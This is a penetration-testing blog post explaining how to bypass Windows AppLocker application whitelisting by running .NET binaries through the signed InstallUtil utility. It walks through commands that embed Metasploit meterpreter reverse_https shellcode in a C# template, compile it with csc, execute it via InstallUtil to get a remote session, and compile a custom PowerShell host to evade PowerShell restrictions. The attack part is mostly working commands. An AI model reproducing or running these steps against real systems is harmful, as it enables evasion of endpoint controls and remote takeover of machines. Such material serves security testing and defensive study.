InstallUtil is a command line utility which is part of the .NET Framework and allows users to quickly install and uninstall applications via the command prompt. Since this utility is a Microsoft signed binary then it could be used to run any .NET executables bypassing in that way AppLocker restrictions. Also this utility is located inside the Windows folder which AppLocker policies are not going to be applied as the contents of the Windows folder are needed to be executed in order for the system to run normally.

This technique was discovered by Casey Smith which on top of that he did some further work by writing C# code that can be used to bypass AppLocker restrictions in order to run PowerShell through the InstallUtil binary.

Generating .NET Executables

The InstallUtil can run executables which are written in .NET language. There is python script written by khr0x40sh which imports Metasploit payloads generated by MSFvenom into a C# template and produces the .NET binary that can be used to evade AppLocker via InstallUtil.

python --cs_file pentestlab.cs
--exe_file /root/Desktop/pentestlab.exe --payload
windows/meterpreter/reverse_https --lhost --lport 443
Generating C# Payloads
Generating C# Payloads

The command above will generate a C# template which will include the Metasploit ShellCode.

Generation of C# File with Shellcode
ShellCode inside C# File

The C# file can be compiled as an executable also via the csc binary of a system that is running .NET framework.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe pentestlab.cs

The compiled executable that contains the malicious payload can be then dropped on the target system. AppLocker prevents the file of being executed however through the Installutil this file is executed as normal and returns a Meterpreter session.

Bypass AppLocker Manually
Bypass AppLocker via InstallUtil
AppLocker Bypass via InstallUtil - Meterpreter Session
AppLocker Bypass – Meterpreter Session


There is a specific Metasploit module which can be used to bypass AppLocker via the InstallUtil method.


This module will generate a .NET executable on the target system and it will utilize the InstallUtil binary to execute the payload bypassing the AppLocker protection.

Metasploit - AppLocker Bypass
Metasploit – AppLocker Bypass


In environments where PowerShell is restricted by AppLocker Casey Smith did some further work and wrote C# code which can be used in conjunction with the InstallUtil bypass technique in order to run PowerShell commands and scripts.

PowerShell Blocked by AppLocker
PowerShell Blocked by AppLocker

The C# code can be compiled with the csc binary in order to produce a PowerShell executable.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\System.Management.Automation.dll /out:powershell.exe InstallUtil-PowerShell.cs

However in order for the above command to run it needs the System.Management.Automation.dll which can be found in one of the directories below:

C:\Windows\winsxs\ 3d144
AppLocker Bypass - Compile a PowerShell Binary
AppLocker Bypass – Compile a PowerShell Binary

The compiled PowerShell binary can be executed via the InstallUtil in order to execute PowerShell commands.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U powershell.exe
AppLocker Bypass - PowerShell
AppLocker Bypass – PowerShell
AppLocker Bypass - PowerShell Version
AppLocker Bypass – PowerShell Version

There is an additional improvement on this code which can be compiled as .DLL and it can take an optional parameter to run PowerShell scripts which are stored locally.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\System.Management.Automation.dll /out:pshell.dll C:\pshell.cs
AppLocker Bypass - PowerShell DLL
AppLocker Bypass – PowerShell DLL
AppLocker Bypass - Execute PowerShell Commands
AppLocker Bypass – Execute PowerShell Commands




Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s